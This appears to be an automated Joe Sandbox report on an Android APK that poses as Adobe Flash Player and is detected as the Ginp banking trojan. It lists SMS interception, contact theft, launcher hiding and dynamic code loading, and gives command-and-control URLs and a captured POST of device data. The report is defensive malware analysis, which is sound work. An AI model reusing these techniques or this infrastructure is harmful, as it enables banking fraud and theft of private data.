Loading ...

Play interactive tourEdit tour

Analysis Report AXG8PgmvaV

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:983771
Start date:24.10.2019
Start time:14:35:51
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 58s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:AXG8PgmvaV
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android 7.1 Nougat
APK Instrumentation enabled:true
Detection:MAL
Classification:mal84.troj.spyw.evad.and@0/252@1/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 216.58.215.227, 172.217.168.4, 172.217.168.10, 172.217.168.46, 172.217.168.78, 216.58.215.238, 172.217.168.14, 172.217.218.188
  • Excluded domains from analysis (whitelisted): connectivitycheck.gstatic.com, android.clients.google.com, android.l.google.com, www.google.com, www.googleapis.com, mobile-gtalk.l.google.com, mtalk.google.com
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all non-executed APIs are in report
  • Not all non-executed methods are in report
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold840 - 100Report FP / FNfalse
Ginp
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for sampleShow sources
Source: AXG8PgmvaVAvira: detection malicious, Label: ANDROID/Drop.Agent.xzklp
Multi AV Scanner detection for submitted fileShow sources
Source: AXG8PgmvaVVirustotal: Detection: 25%Perma Link

Networking:

barindex
Opens an internet connectionShow sources
Source: improve.harbor.eager.q;->run:5API Call: java.net.URL.openConnection("http://carnivors284.info/api3/ping.php")
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Found strings which match to known social media urlsShow sources
Source: classes.dexString found in binary or memory: Lcom/facebook/login/LoginClient; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: "Lcom/facebook/login/LoginBehavior; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: $Lcom/facebook/login/DefaultAudience; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: (Lcom/facebook/login/LoginClient$Request; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: ,Lcom/facebook/login/LoginClient$Result$Code; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: Lcom/facebook/appevents/g; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: Lcom/facebook/appevents/g;$Lcom/facebook/login/DefaultAudience;"Lcom/facebook/login/LoginBehavior;(Lcom/facebook/login/LoginClient$Request;,Lcom/facebook/login/LoginClient$Result$Code; Lcom/facebook/login/LoginClient; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: Lcom/facebook/login/c; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: Lcom/facebook/login/c;?Lcomfort/BMiDsFxUiPjUoTlQmRuPySeHaEqQwGiGmUoIhRjFxAzKnBxWfQyKi;3Lcomfort/GHnGpTzJtAkHeCmMzKpEgYfUnNlIcNpZlRdGxUdLl; equals www.facebook.com (Facebook)
Source: classes.dexString found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: DAOO.json.drString found in binary or memory: facebook equals www.facebook.com (Facebook)
Source: DAOO.json.drString found in binary or memory: twitter equals www.twitter.com (Twitter)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: carnivors284.info
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /api3/ping.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: carnivors284.infoConnection: Keep-AliveAccept-Encoding: gzipContent-Length: 219Data Raw: 7b 22 44 45 56 49 43 45 5f 49 44 22 3a 22 62 38 65 36 38 38 62 38 37 61 62 34 31 66 39 22 2c 22 54 41 47 22 3a 22 61 64 6f 62 65 32 22 2c 22 53 4d 53 5f 41 4c 4c 4f 57 22 3a 31 2c 22 48 49 44 44 45 4e 5f 53 4d 53 5f 41 4c 4c 4f 57 22 3a 31 2c 22 43 43 5f 47 52 41 42 42 45 52 22 3a 30 2c 22 45 58 54 45 4e 44 45 44 5f 49 4e 4a 45 43 54 49 4f 4e 22 3a 30 2c 22 41 43 43 45 53 53 49 42 49 4c 49 54 59 22 3a 30 2c 22 53 43 52 45 45 4e 5f 4f 4e 22 3a 31 2c 22 49 4e 53 54 41 4c 4c 22 3a 31 2c 22 50 4b 47 5f 4e 41 4d 45 22 3a 22 61 63 63 65 73 73 2e 70 61 63 74 2e 61 67 65 6e 74 22 2c 22 52 45 4c 45 41 53 45 5f 56 45 52 53 49 4f 4e 22 3a 22 32 2e 30 64 22 7d Data Ascii: {"DEVICE_ID":"b8e688b87ab41f9","TAG":"adobe2","SMS_ALLOW":1,"HIDDEN_SMS_ALLOW":1,"CC_GRABBER":0
Urls found in memory or binary dataShow sources
Source: DAOO.json.drString found in binary or memory: http://127.0.0.1
Source: DAOO.json.drString found in binary or memory: http://carnivors284.info/api3
Source: androidString found in binary or memory: http://carnivors284.info/api3/ping.php
Source: dynload.xmlString found in binary or memory: http://schemas.android.com/apk/res/android

E-Banking Fraud:

barindex
Detected Ginp e-Banking trojan loaderShow sources
Source: Limprove/harbor/eager/MainServiceJob;->b()VMethod string: Ginp strings
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS
May query for the most recent running application (usually for UI overlaying)Show sources
Source: improve.harbor.eager.AccessibilityWatcher$1;->rungetRunningTasks and getPackageName invocations in same method: improve.harbor.eager.AccessibilityWatcher$1;->run:10, improve.harbor.eager.AccessibilityWatcher$1;->run:13
Source: improve.harbor.eager.AccessibilityWatcher$1;->rungetRunningTasks and getPackageName invocations in same method: improve.harbor.eager.AccessibilityWatcher$1;->run:10, improve.harbor.eager.AccessibilityWatcher$1;->run:13

Spam, unwanted Advertisements and Ransom Demands:

barindex
Has permission to send SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.SEND_SMS
Has permission to write to the SMS storageShow sources
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Sends SMS using SmsManagerShow sources
Source: improve.harbor.eager.MainServiceJob;->a:10API Call: android.telephony.SmsManager.sendTextMessage

Change of System Appearance:

barindex
Acquires a wake lockShow sources
Source: improve.harbor.eager.AccessibilityS;->onServiceConnected:394API Call: android.os.PowerManager$WakeLock.acquire

System Summary:

barindex
Requests to ignore battery optimizationsShow sources
Source: Limprove/harbor/eager/Permissions;->d(Landroid/content/Context;)VMethod string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.MODIFY_AUDIO_SETTINGS
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Classification labelShow sources
Source: classification engineClassification label: mal84.troj.spyw.evad.and@0/252@1/0
Reads shares settingsShow sources
Source: improve.harbor.eager.g;->a:10API Call: "ANDROID_ID":
Source: improve.harbor.eager.g;->a:10API Call: "SERVER_SMS_URL":
Source: improve.harbor.eager.g;->a:10API Call: "SERVER_IP": http://carnivors284.info/api3
Source: improve.harbor.eager.g;->a:10API Call: "SERVER_PING_URL": http://carnivors284.info/api3/ping.php
Source: improve.harbor.eager.g;->a:10API Call: "ANDROID_ID": b8e688b87ab41f9
Source: improve.harbor.eager.g;->a:10API Call: "APP_TAG": adobe2
Source: improve.harbor.eager.g;->a:10API Call: "RELEASE_VERSION": 2.0d
Source: improve.harbor.eager.g;->a:10API Call: "APP_NAME": Adobe Flash Player

Data Obfuscation:

barindex
Obfuscates method namesShow sources
Source: AXG8PgmvaVTotal valid method names: 1%
Uses reflectionShow sources
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->wisecement:53API Call: Real call: null
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->wisecement:53API Call: Real call: public static android.app.ActivityThread android.app.ActivityThread.currentActivityThread()
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->reportmargin:44API Call: Real call: final android.util.ArrayMap android.app.ActivityThread.mPackages
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->casualpattern:18API Call: Real call: private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->produceanchor_sub:76API Call: java.lang.reflect.Method.invoke
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->sheriffcruise:79API Call: java.lang.reflect.Field.get
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->thispanther:80API Call: java.lang.reflect.Field.get
Source: improve.harbor.eager.receivers.DownloadReceiver;->onReceive:22API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

barindex
Tries to get accessibilty permissions (for UI automation)Show sources
Source: improve.harbor.eager.SettingsActivity;->onCreate:28API Call: improve.harbor.eager.SettingsActivity.startActivity

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: improve.harbor.eager.AccessibilityS;->onServiceConnected:390API Call: android.os.PowerManager.newWakeLock
Starts/registers a service/receiver on phone boot (autostart)Show sources
Source: improve.harbor.eager.receivers.MainReceiver;->onReceive:52API Call: android.content.Context.startService (not executed)
Source: improve.harbor.eager.receivers.MainReceiver;->onReceive:53API Call: android.content.Context.startService (not executed)

Hooking and other Techniques for Hiding and Protection:

barindex
Removes its application launcher (likely to stay hidden)Show sources
Source: improve.harbor.eager.PreActivity;->a:18API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: improve.harbor.eager.AccessibilityWatcher;->onDestroy:55API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Has permission to draw over other applications or user interfacesShow sources
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS
Queries list of running processes/tasksShow sources
Source: improve.harbor.eager.AccessibilityWatcher$1;->run:10API Call: android.app.ActivityManager.getRunningTasks

Malware Analysis System Evasion:

barindex
Queries the unique operating system id (ANDROID_ID)Show sources
Source: improve.harbor.eager.PreActivity;->onCreate:124API Call: android.provider.Settings.Secure.getString

Anti Debugging:

barindex
Access the class loader (often done to load a new code)Show sources
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->trashvoid:47API Call: java.lang.Class.getDeclaredField("mClassLoader")
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->replaceClassUnit(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)VMethod string: "mClassLoader"
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->trashvoid(Ljava/lang/Class;Ljava/lang/String;)Ljava/lang/reflect/Field;Method string: "mClassLoader"
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->fleedawn()Ljava/lang/String;Method string: "mClassLoader"

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses the DexClassLoader (often used for code injection)Show sources
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->drillrhythm:20API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/access.pact.agent/app_DynamicOptDex/DAOO.json")

Stealing of Sensitive Information:

barindex
Uploads sensitive phone information to the internet (privacy leak)Show sources
Source: 192.168.1.92:54824 -> 104.27.165.230:80HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID)
Source: 192.168.1.92:54824 -> 104.27.165.230:80HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID)
Source: 192.168.1.92:54824 -> 104.27.165.230:80HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID)
Source: 192.168.1.92:54826 -> 104.27.165.230:80HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID)
Creates SMS data (e.g. PDU)Show sources
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:30API Call: android.telephony.SmsMessage.createFromPdu
Has permission to read contactsShow sources
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Has permission to read the SMS storageShow sources
Source: submitted apkRequest permission: android.permission.READ_SMS
Has permission to read the phones state (phone number, device IDs, active call ect.)Show sources
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Monitors incoming SMSShow sources
Source: improve.harbor.eager.sms.IncomingSmsListenerRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Parses SMS data (e.g. originating address)Show sources
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:31API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:32API Call: android.telephony.SmsMessage.getMessageBody
Queries SMS dataShow sources
Source: improve.harbor.eager.MainServiceJob;->h:184API Call: android.net.Uri.parse("content://sms/")
Queries a list of installed applicationsShow sources
Source: improve.harbor.eager.MainServiceJob;->d:37API Call: android.content.pm.PackageManager.getInstalledApplications
Queries phone contact informationShow sources
Source: improve.harbor.eager.MainServiceJob;->g:102Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI

Remote Access Functionality:

barindex
Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)Show sources
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:26API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Found suspicious command strings (may be related to BOT commands)Show sources
Source: Limprove/harbor/eager/j;->a(Ljava/lang/String;)Ljava/lang/String;Method string: "hidden sms started"
Source: Limprove/harbor/eager/MainServiceJob;->b()VMethod string: "get_contacts"
Source: Limprove/harbor/eager/Permissions;->a(Landroid/content/Context;)ZMethod string: "android.permission.send_sms"
Source: Limprove/harbor/eager/j;->a(Ljava/lang/String;)Ljava/lang/String;Instruction: "const-string v2, "hidden sms started""
Source: Limprove/harbor/eager/MainServiceJob;->b()VInstruction: "const-string v2, "get_contacts""
Source: Limprove/harbor/eager/Permissions;->a(Landroid/content/Context;)ZInstruction: "const-string v2, "android.permission.send_sms""
Uses DownloadManager to fetch additional componentsShow sources
Source: improve.harbor.eager.Installer;->onCreate:51API Call: android.app.DownloadManager.enqueue

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AXG8PgmvaV26%VirustotalBrowse
AXG8PgmvaV100%AviraANDROID/Drop.Agent.xzklp

Dropped Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
carnivors284.info0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://127.0.0.10%VirustotalBrowse
http://127.0.0.10%Avira URL Cloudsafe
http://carnivors284.info/api30%Avira URL Cloudsafe
http://carnivors284.info/api3/ping.php0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
108.177.127.188downloadMe.apkGet hashmaliciousBrowse
    AntiVirus_com.antivirus.apkGet hashmaliciousBrowse
      AapgMZnJUbGet hashmaliciousBrowse
        fwa5d2ukPSGet hashmaliciousBrowse
          i2vKzz91dRGet hashmaliciousBrowse
            GVfg1uSjXe.apkGet hashmaliciousBrowse
              Cy740jc5PSGet hashmaliciousBrowse
                NxdkwWqZQm.apkGet hashmaliciousBrowse
                  aVEMRt6TYiGet hashmaliciousBrowse
                    2tOzBnOY5ZGet hashmaliciousBrowse
                      6MgH0XSp33Get hashmaliciousBrowse
                        connect_testGet hashmaliciousBrowse
                          com.filtershekanha.teledr_571_apkplz.net.apkGet hashmaliciousBrowse
                            DpPCix7fdW.apkGet hashmaliciousBrowse
                              rc0nWeTOKUGet hashmaliciousBrowse
                                com.cootek.smartinputv5_2019-06-06.apkGet hashmaliciousBrowse
                                  GQjDNGfQnbGet hashmaliciousBrowse
                                    yT6XDEfEZMGet hashmaliciousBrowse
                                      cpb.apkGet hashmaliciousBrowse
                                        cYdkwkn884Get hashmaliciousBrowse

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          unknownDETAILS-24102019-P6818.docGet hashmaliciousBrowse
                                          • 166.62.6.39
                                          FA_36802305641_Oct2019.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          RFQ- PURCHASE ORDER 270MT JEBEL ALI.docGet hashmaliciousBrowse
                                          • 23.20.239.12
                                          RFQ - NEW PURCHASE ORDER.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          3b#U0448.exeGet hashmaliciousBrowse
                                          • 195.123.220.115
                                          info_10_22.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          https://estudiogalt.com/HOULIHANLOKEY/Get hashmaliciousBrowse
                                          • 157.240.20.35
                                          info_10_24.docGet hashmaliciousBrowse
                                          • 194.87.111.66
                                          https://ausbuildproltd.com/Get hashmaliciousBrowse
                                          • 79.134.225.70
                                          pt6HoCUEGz.exeGet hashmaliciousBrowse
                                          • 195.123.220.115
                                          Statement.pdfGet hashmaliciousBrowse
                                          • 3.3.0.2
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          VwX1UeLBjq.exeGet hashmaliciousBrowse
                                          • 190.13.160.19
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          Payment.docGet hashmaliciousBrowse
                                          • 104.28.28.20
                                          IT54985044967641616345156438179559489126089863741.vbsGet hashmaliciousBrowse
                                          • 185.189.151.22
                                          f.ra.000070031.docGet hashmaliciousBrowse
                                          • 8.209.83.211
                                          bonny (1).pdfGet hashmaliciousBrowse
                                          • 3.3.0.2
                                          M9HYn2QYu6.exeGet hashmaliciousBrowse
                                          • 23.23.83.153
                                          unknownDETAILS-24102019-P6818.docGet hashmaliciousBrowse
                                          • 166.62.6.39
                                          FA_36802305641_Oct2019.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          RFQ- PURCHASE ORDER 270MT JEBEL ALI.docGet hashmaliciousBrowse
                                          • 23.20.239.12
                                          RFQ - NEW PURCHASE ORDER.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          3b#U0448.exeGet hashmaliciousBrowse
                                          • 195.123.220.115
                                          info_10_22.docGet hashmaliciousBrowse
                                          • 192.168.2.255
                                          https://estudiogalt.com/HOULIHANLOKEY/Get hashmaliciousBrowse
                                          • 157.240.20.35
                                          info_10_24.docGet hashmaliciousBrowse
                                          • 194.87.111.66
                                          https://ausbuildproltd.com/Get hashmaliciousBrowse
                                          • 79.134.225.70
                                          pt6HoCUEGz.exeGet hashmaliciousBrowse
                                          • 195.123.220.115
                                          Statement.pdfGet hashmaliciousBrowse
                                          • 3.3.0.2
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          VwX1UeLBjq.exeGet hashmaliciousBrowse
                                          • 190.13.160.19
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          Swift_MT103_-USD_550000_Settlement.xlsGet hashmaliciousBrowse
                                          • 104.22.3.84
                                          Payment.docGet hashmaliciousBrowse
                                          • 104.28.28.20
                                          IT54985044967641616345156438179559489126089863741.vbsGet hashmaliciousBrowse
                                          • 185.189.151.22
                                          f.ra.000070031.docGet hashmaliciousBrowse
                                          • 8.209.83.211
                                          bonny (1).pdfGet hashmaliciousBrowse
                                          • 3.3.0.2
                                          M9HYn2QYu6.exeGet hashmaliciousBrowse
                                          • 23.23.83.153

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Screenshots

                                          Thumbnails

                                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.